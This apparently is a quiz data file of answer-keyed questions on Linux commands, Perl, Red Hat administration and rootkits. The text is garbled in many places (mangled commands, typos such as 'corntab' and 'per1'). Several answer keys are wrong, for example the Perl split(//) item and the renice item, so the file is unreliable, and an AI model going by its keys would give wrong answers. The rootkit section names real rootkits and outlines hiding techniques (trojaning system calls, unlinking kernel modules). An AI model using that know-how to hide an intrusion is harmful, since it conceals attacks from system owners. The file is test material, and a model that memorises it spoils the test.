B,C#Linux Q33. Which of the following commands could be used to see which processes are currently run (chose all that apply)	^A: w	^B: ps	^C: top	^D: proc	^E: lsproc
C:Q34. What utility would you use to remove/display columns from each line of a file?	^A: pwd	^B: col	^C: cut	^D: tail	^E: extract
D#Linux Q35. In the command foo < bar # foobar	^A: the stdout from the command foobar is saved to the file foo	^B: the stdout from the command foo is saved to the foobar	^C: the command foobar receives its stdin from the stderr of foo	^D: the command foobar receives its stdin form the stdout of foo	^E: the command bar receives its stdin form the contents of the file foobar
D#Linux Q36. Assume that the file foobar contains 30 lines. Which command line would you use to display the middle 10 lines of the file?	^A: tail -n 10 -h 10	^B: head -n 10 -s 10	^C: head m 10 foobar # tail -n 10 n lo	^D: head -n 20 foobar # tail -n 10	^E: tail -n 20
A,B#Linux Q37. Which programs will allow you to change me priority or a program already running? (Select all that apply)	^A: top	^B: nice	^C: niceit	^D: renice	^E: chnice 
C#Linux Q38. What will "cd ~foo" do?	^A: It will take you to the ~foo directory	^B: It will create the foo directory and change to it	^C: It will take you to the home directory of user foo	^D: It will change the directory to the system foo directory	^E: it will change to the foo directory off of your home directory
C#Linux Q39. Sally has created a tea file for data which uses an asterisk to highlight items of significance would list the line she marked as significant in her file?	^A: find \* sallysfile	^B: wc -l *	^C: grep -n * sallysfile	^D: search *	^E: grep \* sallysfile
A#Linux Q40. Which ps parameter would part use to display the processes of all other users?	^A: a	^B: b	^C: u	^D: x
D,E#Linux Q41. Which of the following directories would you probably not want to include in your backup (Select all that apply)	^A: /var	^B: /etc	^C: /dev	^D: /tmp	^E: /proc 
B#Linux Q42. Assume you have a script /etc/httpdown that shuts down your web server. For some reason, you want to run this it midnight tonight What command will do that?	^A: crontab -e	^B: at midnight /etc/httpdown	^C: cron -at "00:00" /etc/httpdown	^D: batch -t "00:00" 
groups#Linux Q43. Which command will tell you which groups you belong to? 
B#Linux Q44. Use, Bob Wilson (bobw) has just retired. You have instructed to remove his account and all files under his home directory. What command would execute this task with one command? (include necessary switches and/or parameters.)	^A: kill -9 bobw	^B: userdel -r bobw	^C: rm -Rf /home/bobw	^D: delete bobw -d/home/bobw	^E: rm user &&rmdir ^bobw ^/home/bobw 
B#Linux Q45. In what file do you change default variables for all users?	^A: /etc/bashrc	^B: /etc/profile	^C: ~/.bash_profile	^D: /etc/skel/.bashrc	^E: /etc/skel/.bash_profile
D#Linux Q47. How many cron fields are there for specifying the time to execute a cron job?	^A: 1	^B: 3	^C: 4	^D: 5	^E: 6 
D#Linux Q48. What does the following line from /etc/syslog.conf a mean?^1:kern warm.mail.err /dev/tty10 ^2:	^A: The kern, warn, mail and err messages are logged to the /dev/tty10	^B: All messages to /dev/tty10 get logged to the files kern.warn and mail.err	^C: The kernel messages with priority warn and the messages from the mailer system with a priority of err get logged to the console 10	^D: Kernel messages with priority warn and above the messages form the mailer system with a priority of err and higher are logged to console 10.
E#Linux Q49. You administer a system on which incremental backups are made between complete backups. Restore the system from the backups, in what order should you load the backups?	^A: The order does not matter as long as all of the backups are loaded	^B: Last complete backup, then each incremental backup from newest to oldest	^C: Each incremental backup from oldest to newest, then last complete backup	^D: Each incremental backup from newest to oldest then last complete backup	^E: Last complete backup, then each incremental backup from oldest to newest
C#Linux Q50. On a system using shadowed passwords, the correct permissions for /etc/passwd are _______ and the correct permissions for /etc/shadow are ______. 	^A: -rw-r-----, -r--------	^B: -rw-r--r--, -r--r--r--	^C: -rw-r--r--, -r--------	^D: -rw-r--rw-, -r-----r--	^E: -rw-------, -r-------- 
E#Linux Q51. Which corntab entry could be used to set the system time at regular intervals?	^A: 1 0*** date $d $t $24	^B: 1 0*** settime $d $t $24	^C: 1 0*** date	$D: 1 0*** /usr/sbin/runcron date	^E: 1 0*** /usr/sbin/ntpdate ntp1.digex.net > /dev/null 2>&1 
E#Linux Q52. Of the ways listed, which is the best way to temporarily suspend a users ability to interactively login?	^A. Changing the users UID	^B. Changing the users password	^C. Changing the users that to /bin/false	^D. Removing the users entry in /etc/passwd	^E. Placing the command logout in the users profile
D#Linux Q53. The command cat > foo.bar redirects	^A: cat to foo.bar	^B: foo.bar to cat	^C: stout to cat 	^D: stdin to foo.bar	^E: foo.bar stdout
E#Linux Q54. You have a HD /dev/hdb, has more than 1024 cylinder. What command line argument can be passed to allow the system to recognize the drive geometry correctly?	^A: /dev/hdb=+1024	^B: boot large drive	^C: hdb=H,S,C	^D: hdb=C,H,S 	^E: /dev/hdb=C,H,S
C#Linux Q3: How many spare server processes are required by Apache for the typical, low-to-moderate volume website?	^A: 1	^B: 50	^C: 10	^D: 200
D:Q4: You have a standard Apache web server installation and want to make it respond to requests on port 8088. To do this, what configuration file do you need to change?	^A: None. This is the default port.	^B: /etc/httpd/apache.conf	^C: /etc/httpd/ports.conf	^D: /etc/httpd/httpd.conf	^E: /etc/httpd/access.conf
E#Linux Q5: Some loadable kernel modules accept options at load time: This can be used to set interrupt or IO addresses, for example: The place to set these options is?	^A: /etc/conf.modules	^B: /etc/lilo.conf	^C: /boot/System.map	^D: /etc/sysconfig	^E: /boot/module-info
E#Linux Q6: You are having some trouble with a disk partition and you need to do maintenance on this partition but your users home directories are on it and several are logged in. Which command would disconnect the users and allow you to safely execute maintenance tasks?	^A: telinit 1	^B: shutdown -r now	^C: killall -9 inetd	^D: /bin/netstop --maint	^E: /etc/rc.d/init.d/network stop
netstat#Linux Q7: What command will display the active connections and Unix domain sockets for a running Linux machine with networking configured? Type just the command to accomplish this.
uname-a#Linux Q8: Type in the command to list your current kernel version, including any switches.
/etc/nsswitch.conf#Linux Q9:Type in the name and full path to the network configuration file that defines the search order for name resolution.
.bash_profile#Linux Q10: A user wishes to modify his Environment variable PATH, What file should you tell him to edit in his home directory. Give filename only, no path.
ps -au#Linux Q11: What command was typed in to produce the output shown below. The entries shown are the full output of the command, less the actual command. Type the command and the options to reproduce similar output.	^1:USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND	^2:root 394 0.0 0.0 1200 444 tty1 S 01:05 0:00 /sbin/getty 38400 tty1	^3:root 396 0.0 0.0 1200 444 tty3 S 01:05 0:00 /sbin/getty 38400 tty3	^4:root 397 0.0 0.0 1200 444 tty4 S 01:05 0:00 /sbin/getty 38400 tty4	^5:root 398 0.0 0.0 1200 444 tty5 S 01:05 0:00 /sbin/getty 38400 tty5	^6:root 399 0.0 0.0 1200 444 tty6 S 01:05 0:00 /sbin/getty 38400 tty6	^7:root 423 0.0 0.0 1200 444 tty2 S 01:06 0:00 /sbin/getty 38400 tty2	^8:root 426 0.2 0.3 2880 1964 pts/0 S 01:07 0:00 -bash
D#Linux Q12: On a debian system which of the following would build a boot disk	^A: mkboot /dev/floppy	^B: make boot --device /dev/fd0 2.4.18-12	^C: mkboot --device /dev/fd0 2.4.18-12	^D: mkboot /boot/vmlinux-2.4.18-12	^E: mkbootdisk /boot/vmlinux-2.4.18-12
B# Perl Q1: Which of the following keyword is used to make an object reference?	^A)  Return	^B)  Bless	^C)  Package	^D)  Object 
C# Perl Q2: Which of the following describes the most accurate difference between the "my" and the "local" expression?	^A)  Using my operator variables make the entire script private.	^B)  Local expression is used to declare variables available called within the sub references when arrays or hashes are used as arguments.	^C)  My expression makes variables private so they can only be used in the current sub and not be passed onto other subs called from within the subroutines.	^D)  It allows the variable to be passed on to other subs called from within the subroutine. 
D# Perl Q3: Which one is the least effective method of reducing code errors?	^A)  Use -w switch and create pseudo code before you start.	^B)  Write reusable code and modular approach.	^C)  Declare and initialize variables.	^D)  Keep strings short and use the non strict pragma at all times. 
A# Perl Q4: What is the @ISA array used for?	^A)  It is used for inheritance wherein a class is said to share a relationship with the classes listed within the @ISA array.	^B)  It is to create relations between classes and methods.	^C)  It is to have reusable code in related classes.	^D)  It is to inherit classes among methods. 
A# Perl Q5: which of the following is NOT a common perl error?	^A)  print MYFILEHANDLE ("Perl makes my life easier."); $ INCORRECT	^B)  The == and the eq operators as well as numeric operators (== !=) and string operators(eq,ne) are used as same operators.	^C)  A block of code is not surrounded by braces ({ }).	^D)  An array operator (@) is used incorrectly in scalar context, such as @array[1] when it should be $array[1]. 
D# Perl Q6: how do you write to a file with the filehandle HANDLE?	^A)  write ( HANDLE, "< write something");	^B)  print ( HANDLE, "write something");	^C)  Write ( HANDLE "write something")	^D)  print ( HANDLE "write something"); 
A# Perl Q7: For what are objects used for?	^A)  Makes scripts easier to use and maintain.	^B)  Provide labels for defined code.	^C)  Create package defenition files.	^D)  Divide codes into smaller pieces. 
D# Perl Q8: How do you create a filehandle for appending?	^A)  append ( HANDLE, "write something");	^B)  print ( HANDLE, "< file.txt");	^C)  open ( HANDLE "+>write something");	^D)  open ( HANDLE "<file.txt"); 
C# Perl Q9: Which of the following statement is true?	^A)  Variable declared by my keyword is global in scope.	^B)  Variable declared by local keyword is only available to the subroutine from which they are declared.	^C)  Variable declared by my keyword is available to calling subroutines.	^D)  Variable declared by local keyword is available to subsequence called subroutine. 
C# Perl Q10: The task of the perl's package is to?	^A)  Label a program.	^B)  Encrypt.	^C)  Ceate new keyword.	^D)  Define a namespace for a block of code.
D# Perl Q11: Consider the following program code:^  @array - ( "Y", "W", "X");^  @array = sort (@array);^  unshift(@array, "Z");^  print($array[0]);^  What is the output of this code?	^A. W	^B. X	^C. Y	^D. Z
D# Perl Q12: Consider the following program code:^  $i  "15";^  LOOP: for(; $i < 25; $i++)^  {^  if ($i % 2)^  {^  next LOOP;^  }^  print("$i ");^  }^What is the result of executing this program code?	^A. The code will output the following: 15 2 4 6 8 10 12 14 16 18 20 22 24	^B. The code will output the following: 15 17 19 21 23 25	^C. The code will fail at line 2 because $i is not initialized.	^D. The code will output the following: 16 18 20 22 24
A# Perl Q13: Which of the following choices demonstrates the correct syntax to pass the argument $arg2 to the subroutine get pass?	^A. get pass($arg2);	^B. call &get pass($arg2);	^C. sub &get pass($arg2);	^D. call get pass($arg2);
B# Perl Q14: Consider the following program code:^  @array - ("ALPHA", "beta", "GaMmA");^  @array = sort (@array);^  print ("@array");^  What is the output of this code?	^A. beta GaMmA ALPHA	^B. ALPHA GaMmA beta	^C. ALPHA beta GaMmA	^D. beta ALPHA GaMmA
A# Perl Q15: Consider the following package definition:^  package Convert;^  Which one of the following statements should immediately follow the given package definition to create a valid module?	^A. 1;	^B. use;	^C. sub;	^D. module Convert
B# Perl Q17: Which one of the following statements will add the symbol table for a package into the including package's symbol table?	^A. include Package;	^B. require Exporter;	^C. require Package;	^D. export Package;
B# Perl Q18 Consider the following code:^  %chars = ("a", "100", "b", "90", "c", "80");^  Which one of the following choices will reverse the key/value pairing of the code?	^A. reverse(%chars);	^B. &chars = reverse(%chars);	^C. reverse(%chars) = &chars;	^D. invert/%chars);
C# Perl Q19: Consider the following command:^  per1 runme.pl arg1 arg2 arg3^  Given this command issued on the command line, what is the value of @ARGV?	^A. arg1	^B. runme.pl	^C. arg1 arg2 arg3	^D. 2
D# Perl Q20: The file handle INPUT is associated with the file represented by $file. Which statement will close the file handle INPUT?	^A. close (INPUT, $file);	^B. close INPUT;	^C. INPUT(close, $file);	^D. close(INPUT);
D# Perl Q21: Given the following statement:^  for ($count-0; $count < 5; $count++) {print $count "}^  What will be the output from the given statement?	^A. 1 2 3 4 5	^B. 5 10 15 20 25	^C. 1 2 3 4	^D. 0 1 2 3 4
D# Perl Q22: Consider the following program code:^  $var - 10;^  package Alpha;^  $var - 20;^  {^  package Beta;^  $var = 30;^  }^  package Gamma;^  $var = 40;^  {^  print $var;^  }^  What is the output of this code?	^A. 10	^B. 20	^C. 30	^D. 40
D# Perl Q23: Consider that a file named test.txt contains this line of text:^  One line of test text.^  What is the output of the following lines of code?^  $file = "test.txt";^  open (OUT, "<$file") || (die "cannot open $file: $!");^  seek(OUT, 15, 0);^  read(OUT, $buffer, 5);^  print $buffer . "\n";^  print tell(OUT);	^A. t text^   20	^B. t tex^   19	^C. t text^   19	^D. t tex^   20
D# Perl Q24: Consider the following code:^  %hashA - ("alpha", "beta", "gamma", "albpa");^  %hashA = reverse(%hashA);^  print $hashA{"alpha"};^  What is the result of executing this code?	^A. The code outputs the following:^   alpha	^B. The code outputs the following:^   beta	^C. The code outputs the following:^   gamma	^D. The code fails at line 3.
C# Perl Q25: Consider the following command:^  perl1 runme.pl arg1 arg2 arg3^  Given this command issued on the command line, what is the value of $#ARGV?	^A. 0	^B. 1	^C. 2	^D. 3
B# Perl Q26: Consider the following code:^  $_ - "New York";^  @array2 = split(//);^  What is the value of $array2[0] after this code is executed?	^A. ""	^B. "New"	^C. "NewYork"	^D. "N"
A# Perl Q27: Consider the following program code:^  $y  "1";^  $x = "2";^  $z = "3";^  do^  {^  print ("$y ");^  } while ($y eq "2");^  do^  {^  print ("$x ");^  } until ($x eq "2");^  print ("$z ");^  What is the result of executing this program code?	^A. The code will output the following:^   1 2 3	^B. The code will output the following:^   3	^C: The code will output the following: ^   3 2	^D. The code will output the following:^   3 2 1
B#RedHat Q1.What is the DirectoryIndex Apache configuration directive used for?	^A. Printing indexes of directories when they do not have an index.html file	^B. The default page to show when the user requests an index of a directory	^C. Directories to ignore	^D. Directories that have access restrictions
A,B#RedHat Q2.Samba is used for:	^A. Sharing resources from a Linux machine to a Windows machine	^B. Accessing resources from a Windows machine, for example mounting an SMB share on a Linux machine	^C. Perform password administration.	^D. Configure NFS shares.
D#RedHat Q3.Which of the following is a journaling filesystem?	^A. ext2	^B. vfat	^C. minix	^D. ext3
A#RedHat Q4.What option to dhcpd is used to specify a certain location for its configuration file?	^A. -cf	^B. -c	^C. -d	^D. -f
A#RedHat Q5.What DHCP server option is used to specify the DNS server to clients?	^A. domain-name-servers	^B. dns	^C. domain-name	^D. routers
B,C#RedHat Q6.In order to open up an SSH shell on a remote machine called 'tiger' using the login name of 'admin',what would be the proper command line for this?	^A. openssh -l admin tiger	^B. ssh -l admin tiger	^C. ssh admin@tiger	^D. sshd tiger admin
A#RedHat Q7.In order to allow the directory /share to be mounted by the host 'tiger' with read and write access, what must the export line look like?	^A. /share tiger(rw)	^B. tiger(rw) /share	^C. /share tiger	^D. /share tiger (rw)
A#RedHat Q8.Which of the following commands would transfer a local file called password.txt to a remote machine called 'tiger' via SCP , logging in as 'admin', and storing the file in /tmp?	^A. scp password.txt admin@tiger:/tmp	^B. scp password.txt tiger@admin:/tmp	^C. scp password.txt admin tiger /tmp	^D. ssh admin@tiger:/tmp
A#RedHat Q9.The first ethernet card on a system is:	^A. eth0	^B. etho0	^C. eth1	^D. hme0
A#RedHat Q10.You can find all of the services managed by xinetd by looking at which of the following file or directory?	^A. /etc/xinetd.d	^B. /etc/inetd.conf	^C. /etc/rc.d/init.d	^D. /etc/xinetd.conf
A#RedHat Q11.'serviceconf' can be used to control xinetd managed services.	^A. True	^B. False
A#RedHat Q12.What is the prefdm file used for?	^A. To specify the preferred X display manager to use	^B. To setup preferences for GNOME	^C. To do performance analysis of system CPU usage	^D. To perform profiling of C code
A#RedHat Q13.What is the difference between the DROP and REJECT targets in iptables?	^A. REJECT will send an error packet back to the source system, whereas DROP will not	^B. DROP will send an error packet back to the source system, whereas REJECT will not	^C. They are equivalent	^D. DROP is invalid, DENY must be used
A#RedHat Q14.Software RAID, such as the Linux MD driver, are dependent on CPU as opposed to hardware RAID, which is implemented on the interface controller itself.	^A. True	^B. False
B#RedHat Q15.In order to set the time zone to 'US/Eastern' via Kickstart, what must be in the Kickstart configuration file?	^A. tz US/Eastern	^B. timezone US/Eastern	^C. It is not possible to set time zone	^D. timeconfig US/Eastern
A#RedHat Q16.Where do the binaries for XFree86 reside in?	^A. /usr/X11R6	^B. /etc	^C. /etc/X11	^D. /X11R6
A#RedHat Q17.Why might it be insecure to execute the command 'xhost +'?	^A. It enables anyone to connect to your X display	^B. It permits root access on your system	^C. It uses up resources on your system	^D. It allows anyone to rsh into your system
B#RedHat Q18.Which file contains the default system desktop environment?	^A. /etc/X11/XF86Config	^B. /etc/sysconfig/desktop	^C. /etc/sysctl.conf	^D. /etc/sysconfig/displaymanager
C#RedHat Q19.What is the proper boot command to use when performing a Kickstart installation from a floppy where configuration is on the floppy itself?	^A. linux ks=fd0	^B. linux ks	^C. linux ks=floppy	^D. linux ks=ks.cfg
B#RedHat Q20.In order to install all possible packages via a Kickstart installation, what must be in the Kickstart configuration file under the %packages section?	^A. @ All	^B. @ Everything	^C. @ Server	^D. @ GNOME
B#RedHat Q21.In which section of the Kickstart configuration file can post-installation commands be specified?	^A. %packages	^B. %postinstall	^C. %pre	^D. %post
B#RedHat Q22.Apache does not require root to start the server if using ports below 1024.	^A. True	^B. False
A#RedHat Q23.Given a floppy image file 'disk.img', what would be the command to mount this image under /mnt/floppy WITHOUT an actual floppy disk? mount -o loop disk.img /mnt/floppy Name based virtual hosts cannot be configured with SSL in Apache.	^A. True	^B. False
A#RedHat Q24.In order to define a Samba share that will have read and write access, what option must be specified for the share in /etc/samba/smb.conf?	^A. writable = yes	^B. rw	^C. rw = yes	^D. public = no
A#RedHat Q25.All times in the DHCP leases file are in which time zone?	^A. GMT	^B. The same time zone as the local system	^C. EST	^D. There are no times in the DHCP leases file
A#RedHat Q26.When using 'chkconfig', do changes to xinetd managed services take affect immediately?	^A. Yes	^B. No
B#RedHat Q27.What does the second field in the file /etc/auto.master refer to?	^A. The mount point	^B. The map file to be consulted	^C. Options	^D. A filesystem alias
D#RedHat Q28.What partition number always refers to the first logical partition?	^A. 0	^B. 4	^C. 1	^D. 5
B#RedHat Q29.The DNS tab of the Red Hat Network Administration Tool allows you to configure the BIND DNS server running on your local machine.	^A. True	^B. False
A#RedHat Q30.'ntsysv' is a program for doing which of the following?	^A. Configure which services are started at boot time	^B. Performing remote administration of Windows NT servers	^C. Accessing Windows NT filesystems	^D. Configuring the modem
A#RedHat Q31.What directory contains PAM configuration files?	^A. /etc/pam.d	^B. /etc/pam	^C. /lib/security	^D. /etc/pam.conf
A#RedHat Q32.What would be the correct option for iptables to specify the incoming network interface to be any Ethernet interfaces on your system?	^A. iptables -i eth+	^B. iptables -i eth*	^C. iptables -i ethernet	^D. iptables -int eth+
A#RedHat Q33.Both RAID level 0 and Linear RAID provide capacity equivalent to the amount of storage you have. In other words, there is no space reserved for parity or error checking. What, then, is the difference between RAID level 0 and Linear RAID?	^A. When using Linear RAID, data is not striped across drives.	^B. When using Linear RAID, data is striped across drives.	^C. RAID 0 provides some amount of error checking.	^D. Linear RAID provides some amount of redundancy.
D#RedHat Q34.In order to list all kernel settings with sysctl, how must this command be invoked?	^A. sysctl -w	^B. sysctl	^C. sysctl --all	^D. sysctl -a
D#RedHat Q35.Performance tuning of IDE hard drives can be done with which of the following commands?	^A. hdtune	^B. ideparm	^C. idetune	^D. hdparm
A#RedHat Q36.Red Hat Linux 7.3 provides a means to give options for loadable kernel modules via which of the following files?	^A. /etc/modules.conf	^B. /etc/sysctl.conf	^C. /etc/kernel.conf	^D. /etc/conf.modules
C#RedHat Q37.What must the 'network' line look like in a Kickstart configuration file in order to have the machine configured for DHCP?	^A. network --nodns	^B. network dhcp	^C. network --bootproto dhcp	^D. network --ip dhcp
A#RedHat Q38.Why is it not recommended to use DNS names in the Apache configuration file?	^A. Apache startup could misconfigure virtual hosts if DNS is unavailable	^B. DNS is very slow	^C. DNS is not supported	^D. Apache cannot perform DNS lookups
A#RedHat Q39.'smbclient' is an FTP-like file transfer program for accessing remote Samba or Windows shares. In order to access the share named 'files' on the remote host 'tiger', logging in as the username 'admin', what would be the proper command line for using smbclient?	^A. smbclient //tiger/files -U admin	^B. smbclient //admin@tiger/files	^C. smbclient tiger:/files -U admin	^D. smbclient -L tiger
A#RedHat Q40.If you have just configured DHCP, and the DHCP server fails to start, what could possibly be the reason?	^A. The dhcpd.leases file does not exist	^B. The dhcp user is not setup	^C. The root user does not have permission to bind to port 67	^D. The dhcrelay server is not running
A#RedHat Q41.OpenSSH can be used to encrypt displaying of remote X Window applications	^A. True	^B. False
A#RedHat Q42.Which of the following files specifies information on what is NFS shared from your system?	^A. /etc/exports	^B. /etc/dfs/dfstab	^C. /etc/fstab	^D. /etc/sharetab
A,B,C,D#RedHat Q43.Which of the following types of devices can the Red Hat Network Administration Tool configure?	^A. Ethernet	^B. ISDN	^C. modem	^D. Token Ring
A#RedHat Q44.What would be the correct way to run 'chkconfig' in order to find out if the 'sendmail' service is enabled or disabled?	^A. chkconfig --list sendmail	^B. chkconfig sendmail	^C. chkconfig sendmail check	^D. chkconfig sendmail on
B#RedHat Q45.The Linux firewalling capabilities ipchains and iptables can be used interchangeably.	^A. True	^B. False
A#RedHat Q46.In Red Hat Linux 7.3, booting rescue mode will attempt to find your root filesystem and mount it automatically.	^A. True	^B. False
B#RedHat Q47.XFree86 version 4 uses separate binaries for each type of video card.	^A. True	^B. False
B#RedHat Q48.When performing a floppy-based Kickstart installation, what is the filename for the Kickstart configuration file to put on the floppy?	^A. kick.cfg	^B. ks.cfg	^C. kix.cfg	^D. kickstart.cfg
B#RedHat Q49.In order to configure Kickstart to create a partition /dev/sda1 mounted on / that will use up the whole disk of /dev/sda, what line must be in the configuration file?	^A. partition / --ondisk sda --size 9999	^B. partition / --ondisk sda --size 1 --grow	^C. part / --ondisk sda --size 1 --grow	^D. fdisk / --ondisk sda --size 1 --grow
A#RedHat Q51.It is possible with Apache to specify your own error documents for HTTP error codes.	^A. True	^B. False
B#RedHat Q52.When using encrypted passwords in Samba, the UNIX system passwords are kept in sync with the Samba passwords.	^A. True	^B. False
A#RedHat Q53.What is the 'dhcrelay' program used for?	^A. It allows you to forward DHCP requests to another DHCP server	^B. It provides a way for testing your DHCP server	^C. Controlling the locally running DHCP server	^D. Restarting the DHCP server
D#RedHat Q54.What command would mount a remote NFS filesystem '/shared' on the host 'tiger' on the local machine to the directory /shared, using a read and write blocksize of 8192?	^A. mount tiger:/shared /shared	^B. mount -o read=8192,write=8192 tiger:/shared /shared	^C. mount -o rw=8192 tiger:/shared /shared	^D. mount -o rsize=8192,wsize=8192 tiger:/shared /shared
A,B#RedHat Q55.Which of the following commands would restart the autofs service?	^A. service autofs restart	^B. /etc/rc.d/init.d/autofs restart	^C. service autofs reload	^D. service autofs status
A,B#RedHat Q56.TCP Wrappers utilizes which of the following files?	^A. /etc/hosts.allow	^B. /etc/hosts.deny	^C. /etc/hosts	^D. /etc/securetty
A#RedHat Q57.What would be the correct option for iptables to specify the incoming network interface to be any Ethernet interfaces on your system?	^A. iptables -i eth+	^B. iptables -i eth*	^C. iptables -i ethernet	^D. iptables -int eth+
A#RedHat Q58.Which of the following commands would block all ICMP packets from the host 1.2.3.4 coming to your machine?	^A. iptables -A INPUT -s 1.2.3.4 -p icmp -j DROP	^B. iptables -A INPUT -s 1.2.3.4 -p icmp -j DENY	^C. iptables -A OUTPUT -s 1.2.3.4 -p icmp -j DENY	^D. iptables -A OUTPUT -s 1.2.3.4 -p icmp -j DROP
A#RedHat Q59.What command could be used to find out which package owns the file /etc/aliases?	^A. rpm -qf /etc/aliases	^B. rpm -qp /etc/aliases	^C. rpm -e /etc/aliases	^D. rpm -qil /etc/aliases
B#RedHat Q60.What is the main configuration file for XFree86 version 4?	^A. /etc/X11/XF86Config	^B. /etc/X11/XF86Config-4	^C. /usr/X11R6/bin/XFree86	^D. XF86_SVGA
A#RedHat Q61.Virtual consoles are which of the following type of devices?	^A. Character devices	^B. Block devices
A#RedHat Q62.Is it possible to execute the post-install section of a Kickstart configuration file with a different interpreter other than Bash?	^A. Yes	^B. No
A#RedHat Q63.What option must be specified in a directive in order to allow execution of CGI scripts in that directory?	^A. ExecCGI	^B. CGI	^C. Executable	^D. Includes
A#RedHat Q64.The Nautilus file manager can be used to browse Samba shares.	^A. True	^B. False
A#RedHat Q65.Using RSA or DSA key pairs in OpenSSH can provide the ability to login to remote machines without providing a password by using the ssh-agent program. What would be the command to generate a RSA key pair?	^A. ssh-keygen -t rsa	^B. ssh-makekey -t rsa	^C. ssh-agent -t rsa	^D. ssh -t rsa
B#RedHat Q66.Which software RAID levels can be used on /boot or a root filesystem containing /boot?	^A. 0	^B. 1	^C. 5
A#RedHat Q67.What are the programs gdm, kdm, and xdm for?	^A. They are X display managers used for authentication	^B. They are the window managers for different desktop environments	^C. They are console programs for configuring the X Window system	^D. They are user administration programs
A#RedHat Q68.What graphical program can be used to create a Kickstart configuration file?	^A. ksconfig	^B. kickconfig	^C. kickstart	^D. rpm
A#RedHat Q69.What is the /etc/sysctl.conf file used for?	^A. Making settings to /proc be permanent across reboots	^B. Providing remote administration to the machine	^C. Configuring password settings	^D. Configuring mail setup
C#RedHat Q70.If 'linux ks' was used as a boot argument for a Kickstart installation, the system will use DHCP to configure the network device and possibly retrieve the location of the Kickstart configuration file via the DHCP settings. ^  If there was no bootfile specified by your DHCP server, what file will the installation program look for? Note that in all answers below, IP is replaced with the IP address of the machine being installed.	^A. /IP-kickstart	^B. /kickstart/IP-ks.cfg	^C. /kickstart/IP-kickstart	^D. /IP-ks.cfg
A,B#RedHat Q71.Where does Apache log messages to?	^A. /var/log/httpd/access_log	^B. /var/log/httpd/error_log	^C. /var/log/access_log	^D. /var/log/error_log
A#RedHat Q72.The configuration file for the OpenSSH server is:	^A. /etc/ssh/sshd_config	^B. /etc/sshd_config	^C. /etc/ssh_ssh_config	^D. /etc/ssh_config
B#RedHat Q73.In order to set the time zone to 'US/Eastern' via Kickstart, what must be in the Kickstart configuration file?	^A. tz US/Eastern	^B. timezone US/Eastern	^C. It is not possible to set time zone	^D. timeconfig US/Eastern
B#RedHat Q74.Which of the following commands will list PCI devices?	^A. lsdevices	^B. lspci	^C. lsdev	^D. pcidev
A#RedHat Q75.The X Window system can run without a window manager.	^A. True	^B. False
C#RedHat Q76.When the initial ramdisk (initrd) image is created, the system determines which SCSI drivers to load in this image by looking in the module configuration file for a module referenced by which of the following strings?	^A. root_disk_driver	^B. scsi_adapter	^C. scsi_hostadapter	^D. root_driver
A,B#RedHat Q77.When booting from a Red Hat Linux CDROM and you would like to perform a Kickstart installation using a Kickstart configuration file ks.cfg located on a floppy disk, what would be the correct boot arguments to use?	^A. linux ks=floppy	^B. linux ks=hd:fd0/ks.cfg	^C. linux floppy	^D. linux ks=ks.cfg
A#RedHat Q78.Whenever /etc/exports is modified, the NFS service needs to be notified to reload its configuration file.	^A. True	^B. False
B#RedHat Q79.What is the maximum number of primary partitions you can have on a hard drive?	^A. 16	^B. 4	^C. 32	^D. 8
C#RedHat Q80.What command could be used to find all packages with the string 'mail' within the package name?	^A. find / -name '*mail*'	^B. rpm -qf /usr/bin/mail	^C. rpm -qa | grep mail	^D. locate mail
A#RedHat Q81.In order to use Kickstart with a configuration file on an NFS server using eth1 to access the network, what would be the proper boot command for this?	^A. linux ks=nfs:/ ksdevice=eth1	^B. linux ks	^C. linux ks=:/ ksdevice=eth1	^D. linux ks=nfs:/ dev=eth1
B#RedHat Q82.The DHCP server shipped with Red Hat Linux stores current lease information in which of the following files?	^A. /etc/dhcpd.leases	^B. /var/lib/dhcp/dhcpd.leases	^C. /etc/dhcp	^D. /etc/dhcpd.conf
A#RedHat Q83.In order to find out whether a certain type of hardware is supported by Red Hat Linux, where can you look?	^A. The Red Hat Hardware Compatibility List (HCL)	^B. /etc/devices	^C. The kernel boot messages	^D. The Red Hat installation disk
A#RedHat Q84.What is the difference between the 'required' and 'requisite' PAM control flags?	^A. When a 'requisite' module check fails, the user is notified immediately as opposed to after all module checks.	^B. When a 'required' module check fails, the user is notified immediate y as opposed to after all module checks.	^C. They are equivalent	^D. When a 'requisite' module check fails, the failure is ignored
B,C,D#RedHat Q85.The /proc filesystem is:	^A. Stored on a hard drive	^B. A directory that has files that can be modified	^C. A directory that contains information on processes	^D. A virtual filesystem
A#RedHat Q86.When using the 'Low Security' setting in the GNOME Lokkit program, you will be able to mount remote NFS shares.	^A. True	^B. False
B#RedHat Q87.Windows 2000 will work with plaintext passwords by default so the 'encrypt password' option is not necessary for Samba shares.	^A. True	^B. False
B#RedHat Q88.Changes made with 'ntsysv' will take affect immediately.	^A. True	^B. False
Intercepts# Rootkits Q1: A rootkit is a tool that _________ kernel-mode software calls
alternate#Rootkits Q2: Instead of allowing commands to be processed normally by the Windows Kernel, rootkits provides an ________ response
Hacker Defender#Rootkits Q3: This is more of a 'blackhat' tool than a training example __________ . 
FU#Rootkits Q4: The __ rootkit can hide processes, elevate process privileges, fake out the Windows Event Viewer so that forensics is impossible, and even hide device drivers (NEW!) All this without any hooking. 
WinlogonHijack#Rootkits Q5: Injects a dll into winlogon.exe and hooks msgina.WlxLoggedOutSAS, logging every login in plaintext. 
NT rootkit#Rootkits Q6: The original and first public NT rootkit 
vanquish#Rootkits Q7: a DLL injection based Romanian rootkit that hides files, folders, registry entries and logs passwords
klister#Rootkits Q8: simple set of utilities for Windows 2000, designed to read the internal kernel data structures, in order to get reliable information about the system state (like list of all processes, including those "hidden" by rootkits, even by 'fu').
Patchfinder2#Rootkits Q9: implements Execution Path Analysis technique for Windows 2000 systems. EPA is intended to detect various kernel and DLL rookits in the system. 
/proc#Rootkits Q10: In UNIX implementation, process information is mapped to directory in _____ file system.
/proc/net/tcp and /proc/net/udp#Rootkits Q11: Similar to process hiding, hiding network connection can be done by preventing it to be log inside ______ and ______ files.
sys_read()#Rootkits Q12: The idea for kernel rootkit is trojaned the _______.
sys_ioctl()#Rootkits Q13: To hide the sniffer is basically hiding the promiscuous flag of the network interface. The system call to Trojan in this case is _______ .
A#Rootkits Q14: The LKM's in the system are kept in a single linked list, to hide the present of LKM rootkit, the LKM rootkit can	^A: remove it from the list	^B: rename the list	^c: delete the list	^D: add an entry to the list
EXPORT_NO_SYMBOLS#Rootkist Q15: Normally functions defined in the LKM will be exported so that other LKM can use them. Hiding these symbols is necessary and macro can be used is ____________. This will prevent any symbol from being exported.
